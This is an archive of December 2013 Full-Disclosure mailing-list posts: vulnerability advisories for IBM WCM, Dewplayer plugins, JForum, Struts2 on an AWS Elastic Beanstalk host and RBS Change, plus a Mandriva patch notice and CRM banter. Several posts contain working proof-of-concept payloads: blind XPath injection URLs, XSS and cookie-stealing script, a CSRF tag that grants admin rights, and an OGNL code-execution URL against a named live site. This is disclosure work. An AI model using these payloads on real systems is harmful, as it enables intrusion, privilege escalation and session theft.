[Full-disclosure] SEC Consult SA-20131227-0 :: IBM Web Content Manager (WCM) XPath Injection
SEC Consult Vulnerability Lab Security Advisory < 20131227-0 > === title: XPath Injection product: IBM Web Content Manager (WCM) vulnerable version: 6.x, 7.x, 8.x fixed version: - impact: high homepage: http://www.ibm.com/ found: 2013-10-27 CVE: CVE-2013-6735 by: A.Antukh, S.Temnikov SEC Consult Vulnerability Lab https://www.sec-consult.com === Vendor description: --- "IBM® Web Content Manager is designed to accelerate web content development and deployment through Internet, intranet and extranet sites. This software enables users to create and publish content while IT retains control. Through advanced personalization, IBM Web Content Manager delivers the right information to the right audience when needed, providing an exceptional customer experience" Source: http://www-03.ibm.com/software/products/en/ibmwebcontmana Business recommendation: The discovered vulnerability can be exploited _without_ authentication and therefore pose a high security risk - it allows extraction of configuration data from the server. The impact of the XPath vulnerability isn't researched fully. SEC Consult suspects that it is possible to extract sensitive information that will be useful for further attacks. The recommendation of SEC Consult is to immediately install patches provided by the vendor. Vulnerability overview/description: --- A typical URL for a host with installed WCM looks like this: http://[HOST]:[PORT]/wps/wcm/connect/[PATH] The "connect" servlet provided in the standard installation of IBM Web Content Manager parses the PATH element as follows: [PATH] = [LIBRARY]/[SITE_AREA_PATH]/[CONTENT] Due to insufficient validation, the "LIBRARY" element suffers from an XPath-injection vulnerability. An unauthenticated user is able to perform blind XPath Injection attacks e.g. get current application configuration, enumerate nodes and extract other valuable information from vulnerable installations of Web Content Manager. Proof of concept: - The vulnerability is exploited due to improper validation of the LIBRARY parameter, which is parsed by the "connect" servlet. The most basic cases are presented below, and allow an attacker to manipulate logic of the request. The "false" clause causes an error, the "true" clause (if not defined explicitly) redirects an attacker to the "/wcm/webinterface/login/login.jsp" page. True clause: http://[HOST]:[PORT]/wps/wcm/connect/' or 'a'='a False clause: http://[HOST]:[PORT]/wps/wcm/connect/' or 'a'='b Knowing the difference between responses of the true and false clauses, it is possible to manipulate requests in order to extract the information. For example, if the following request returns TRUE, this would give an attacker information about the "name" property. http://[HOST]:[PORT]/wps/wcm/connect/' or (@ibmcontentwcm:name = "pznDT") or 'a'='b In a similar way, with use of the "jcr:like" and "jcr:contains" functions one can effectively restore the value for the "target" property. Vulnerable / tested versions: - The vulnerability is verified to exist in the 7.0 and 8.0 versions of WCM which are the most recent versions at the moment of writing the advisory. Vendor contact timeline: 2013-12-04: Contacted vendor through ps...@vnet.ibm.com. 2013-12-04: Initial vendor response. 2013-12-06: Issues will be verified. 2013-12-20: Security bulletin released. 2013-12-27: SEC Consult releases coordinated security advisory. Solution: - Apply the Interim Fix PI0 www.ibm.com/eserver/support/fixes/fixcentral/swg/quickorder?productid=WebSphere%20Portal&brandid=5&apar=PI0 Workaround: --- No workaround available. Advisory URL: - https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm ~~~ SEC Consult Vulnerability Lab SEC Consult Vienna - Bangkok - Frankfurt/Main - Montreal - Singapore - Vilnius Headquarter: Mooslackengasse 17, 1190 Vienna, Austria Phone: +43 1 8903043 0 Fax: +43 1 8903043 15 Mail: research at sec-consult dot com Web: https://www.sec-consult.com Blog: http://blog.sec-consult.com Twitter: https://twitter.com/sec_consult EOF A. Antukh / @2013 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Vulnerabilities in plugins for WordPress, Joomla and Plone with Dewplayer
Hello list! These are Content Spoofing and Cross-Site Scripting vulnerabilities in plugins for WordPress, Joomla and Plone with Dewplayer. Earlier I wrote about vulnerabilities in Dewplayer (http://seclists.org/fulldisclosure/2013/Dec/192). This is media player, which is used at thousands web sites and in multiple web applications. There are near 422 000 web sites with dewplayer.swf in Google's index. And it's just one file name and there are other file names of this player (such as dewplayer-en.swf and others). This flash media player is used in the next plugins: Dewplayer WordPress plugin, JosDewplayer and mosdewplayer for Joomla and collective.dewplayer for Plone. Also there can be other plugins with Dewplayer. - Affected products: - Vulnerable are the next web applications: Dewplayer WordPress plugin 1.2 and previous versions, JosDewplayer 2.0 and previous versions, all versions of mosdewplayer, collective.dewplayer 1.2 and previous versions. Vulnerable are web applications which are using Dewplayer 2.2.2 and previous versions. - Affected vendors: - Plugins for different CMS with Dewplayer: http://wordpress.org/extend/plugins/dewplayer-flash-mp3-player/ http://extensions.joomla.org/extensions/multimedia/audio-players-a-gallery/4779 http://plone.org/products/collective.dewplayer -- Details: -- These are examples of some vulnerabilities in Dewplayer, examples of all СS and XSS vulnerabilities see in above-mentioned advisory. Dewplayer for WordPress: Plugin contains the next flash-files: dewplayer.swf, dewplayer-mini.swf, dewplayer-multi.swf. All of them have CS holes. Content Spoofing (Content Injection) (WASC-12): http://site/wp-content/plugins/dewplayer-flash-mp3-player/dewplayer.swf?mp3=1.mp3 http://site/wp-content/plugins/dewplayer-flash-mp3-player/dewplayer.swf?file=1.mp3 http://site/wp-content/plugins/dewplayer-flash-mp3-player/dewplayer.swf?sound=1.mp3 http://site/wp-content/plugins/dewplayer-flash-mp3-player/dewplayer.swf?son=1.mp3 Full path disclosure (WASC-13): http://site/wp-content/plugins/dewplayer-flash-mp3-player/dewplayer.php JosDewplayer and mosdewplayer: Plugin JosDewplayer is based on mosdewplayer, so holes must be similar in them. Plugin contains the next flash-files: dewplayer.swf, dewplayer-multi.swf, dewplayer-playlist.swf, dewplayer-rect.swf. All of them have CS holes. http://site/plugins/content/josdewplayer/dewplayer.swf collective.dewplayer: Plugin contains the next flash-files: dewplayer-mini.swf, dewplayer.swf, dewplayer-multi.swf, dewplayer-rect.swf, dewplayer-playlist.swf, dewplayer-bubble.swf, dewplayer-vinyl.swf. All of these flash-files have CS holes and dewplayer-vinyl.swf also has XSS holes. The path at web site can be different: http://site/files/++resource++collective.dewplayer/dewplayer.swf Content Spoofing (Content Injection) (WASC-12): http://site/path/dewplayer.swf?mp3=1.mp3 XSS (WASC-08): http://site/path/dewplayer-vinyl.swf?xml=xss.xml xss.xml javascript:alert(document.cookie) XSS Timeline: 2013.10.25 - announced at my site. 2013.10.26 - informed developers. 2013.12.19 - disclosed at my site about Dewplayer. 2013.12.24 - disclosed at my site about plugins (http://websecurity.com.ua/6931/). Best wishes & regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Happy Holidays / Xmas Advisory
And it just so kindly tells you were everything is located, just in case you wanted to know Ex: http://demo.fatfreecrm.com/passwords/ I half expected to find password hashes but oh well that's life. It is a great "hack me" application when you can find random vulns simply by dicking around on your phone. > On Dec 26, 2013 3:56 AM, "PsychoBilly" wrote: >> >> [[ Henri Salo ]] @ [[ 24/12/2013 18:33 ]]-- >> > On Tue, Dec 24, 2013 at 11:26:15AM +0100, joernchen wrote: >> >> A rather informal advisory on Fat Free CRM (http://fatfreecrm.com/): >> > >> > I created https://github.com/fatfreecrm/fat_free_crm/issues/300 for tracking. >> > >> > --- >> > Henri Salo >> > >> > ___ >> > Full-Disclosure - We believe in it. >> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html >> > Hosted and sponsored by Secunia - http://secunia.com/ >> > >> I really like the full user db listing "feature" >> view-source:http://demo.fatfreecrm.com/login >> >> ___ >> Full-Disclosure - We believe in it. >> Charter: http://lists.grok.org.uk/full-disclosure-charter.html >> Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Happy Holidays / Xmas Advisory
That is the obvious way to reduce DB calls when authenticating. Duh. On 12/26/2013 03:55 AM, PsychoBilly wrote: > [[ Henri Salo ]] @ [[ 24/12/2013 18:33 > ]]-- >> On Tue, Dec 24, 2013 at 11:26:15AM +0100, joernchen wrote: >>> A rather informal advisory on Fat Free CRM (http://fatfreecrm.com/): >> I created https://github.com/fatfreecrm/fat_free_crm/issues/300 for tracking. >> >> --- >> Henri Salo >> >> ___ >> Full-Disclosure - We believe in it. >> Charter: http://lists.grok.org.uk/full-disclosure-charter.html >> Hosted and sponsored by Secunia - http://secunia.com/ >> > I really like the full user db listing "feature" > view-source:http://demo.fatfreecrm.com/login > > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [CVE-2013-7209]JForum CSRF(Cross-site request forgery) Vulnerability
Version: All Vulnerability : Cross-site request forgery Problem type : remote CVE ID : CVE-2013-7209 Jforum Admin module, modify user permissions module exists crsf Vulnerability,use the following code into jforum forum posts, as long as this administrators is opened this post, the permissions of user with id 12696 will be Escalated to the group with id 2 permissions,default group with id 2 is administrator group. Code: http://www.target.com/forum/admBase/login.page?action=groupsSave&module=adminUsers&user_id=12696&groups=2 width=0 /> Code Description: http://www.target.com/forum/ jforum forum address, 12696 for the user id 2 group id width=0 is used to hide pic It was discovered by arno @dbappsecurity.com.cn___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [Wooyun]Amazon elasticbeanstalk code execution
*Form:*http://en.wooyun.org/bugs/wooyun-2013-040
*Abstract:*
AWS Elastic Beanstalk is an even easier way for you to quickly deploy and
manage applications in the AWS cloud. elasticbeanstalk subdomain exists
Struts2 code execution .
*Details:*
poc return [/ok]:
http://jewelopoly.elasticbeanstalk.com/login.action?redirect:${%23w%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse').getWriter(),%23w.println('[/ok]'),%23w.flush(),%23w.close()}
--
WooYun, an Open and Free Vulnerability Reporting Platform
For more information, please visit http://en.wooyun.org/about.php
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] RBS Change v3.6.8 XSS Vulnerability
Hi guys, You can find the software affected at http://www.rbschange.fr/addons/distributions/RBS-Change-Core,51422.html Thanks, Metropolis ### # # Script Name : RBS Change # # Version : v3.6.8 # # Bug Type : XSS vulnerability # # Found by : Metropolis # # Home : http://metropolis.fr.cr # # Discovered : 25/12/2013 # # Download app : http://www.rbschange.fr/addons/distributions/RBS-Change-Core,51422.html # # Google search : Propulsé par RBS Change # ### PoC : http://[target]/[path]/fr/website/Resultat-de-recherche,12470.html?solrsearchParam[terms]=[XSS] Example : http://[target]/[path]/fr/website/Resultat-de-recherche,12470.html?solrsearchParam[terms]=1";>alert(31337); local Example : http://localhost/demo/fr/website/Resultat-de-recherche,12470.html?solrsearchParam[terms]=1";>alert(31337); ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [ MDVSA-2013:302 ] pixman
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2013:302 http://www.mandriva.com/en/support/security/ ___ Package : pixman Date: December 23, 2013 Affected: Business Server 1.0, Enterprise Server 5.0 ___ Problem Description: Updated pixman package fixes security vulnerability: Bryan Quigley discovered an integer underflow in pixman. If a user were tricked into opening a specially crafted file, an attacker could cause a denial of service via application crash (CVE-2013-6425). ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6425 http://advisories.mageia.org/MGASA-2013-0366.html ___ Updated Packages: Mandriva Enterprise Server 5: f7ee3ab307c207a3a08026a0e8fcf471 mes5/i586/libpixman-1_0-0.12.0-1.1mdvmes5.2.i586.rpm 322722f3027cc6e63ee972ee191f8429 mes5/i586/libpixman-1-devel-0.12.0-1.1mdvmes5.2.i586.rpm 015f5f4e3ba553c7600073884c0f53a3 mes5/SRPMS/pixman-0.12.0-1.1mdvmes5.2.src.rpm Mandriva Enterprise Server 5/X86_64: d289e8e1e0d5cc0f35f5f52fa75e6ded mes5/x86_64/lib64pixman-1_0-0.12.0-1.1mdvmes5.2.x86_64.rpm 83e73f54a3c81a09d7807b21b401e60b mes5/x86_64/lib64pixman-1-devel-0.12.0-1.1mdvmes5.2.x86_64.rpm 015f5f4e3ba553c7600073884c0f53a3 mes5/SRPMS/pixman-0.12.0-1.1mdvmes5.2.src.rpm Mandriva Business Server 1/X86_64: b442ad4d24d8b5acbfaa77ffae6adc02 mbs1/x86_64/lib64pixman1_0-0.24.4-2.2.mbs1.x86_64.rpm 0a2ad485f80ad0de99a99abe8af94d12 mbs1/x86_64/lib64pixman-devel-0.24.4-2.2.mbs1.x86_64.rpm ced5b5e2454ea186181e3afa0b01c69f mbs1/SRPMS/pixman-0.24.4-2.2.mbs1.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/en/support/security/advisories/ If you want to report vulnerabilities, please contact security_(at)_mandriva.com ___ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.12 (GNU/Linux) iD8DBQFSuB8lmqjQ0CJFipgRAhS2AJ99d9rlhx88EhwVCvqkTNzzl9VzxQCgpBdd FJt3c4pzPaeUi5HJAz9NG54= =twZc -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Happy Holidays / Xmas Advisory
[[ Henri Salo ]] @ [[ 24/12/2013 18:33 ]]-- > On Tue, Dec 24, 2013 at 11:26:15AM +0100, joernchen wrote: >> A rather informal advisory on Fat Free CRM (http://fatfreecrm.com/): > > I created https://github.com/fatfreecrm/fat_free_crm/issues/300 for tracking. > > --- > Henri Salo > > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > I really like the full user db listing "feature" view-source:http://demo.fatfreecrm.com/login ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
